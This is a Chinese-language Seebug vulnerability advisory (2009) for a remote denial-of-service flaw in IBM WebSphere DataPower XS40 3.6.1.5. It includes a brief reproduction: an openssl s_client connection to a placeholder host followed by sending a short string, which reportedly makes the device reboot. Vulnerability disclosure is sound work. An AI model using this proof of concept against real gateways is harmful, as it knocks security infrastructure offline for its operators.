IBM WebSphere DataPower XML Security Gateway XS40远程拒绝服务漏洞

2009-01-11T00:00:00
ID SSV:4650
Type seebug
Reporter Root
Modified 2009-01-11T00:00:00

Description

BUGTRAQ ID: 33169 CNCAN ID:CNCAN-2009010903

IBM WebSphere DataPower XML Security Gateway XS40是一款XML安全网关。 通过已经建立的SSL连接,发送简单的(random?)字符串给IBM DataPower XS40安全网关设备,可导致设备重启,造成拒绝服务攻击。

IBM WebSphere DataPower XML Security Gateway XS40 3.6.1 .5 厂商解决方案 目前没有解决方案提供: <a href=http://www-01.ibm.com/software/integration/datapower/xs40/ target=_blank rel=external nofollow>http://www-01.ibm.com/software/integration/datapower/xs40/</a>

                                        
                                            
                                                openssl s_client -connect [IP]:[port]
Loading 'screen' into random state - done
CONNECTED(0000078C)
..
---
abc [enter][enter]
read:errno=0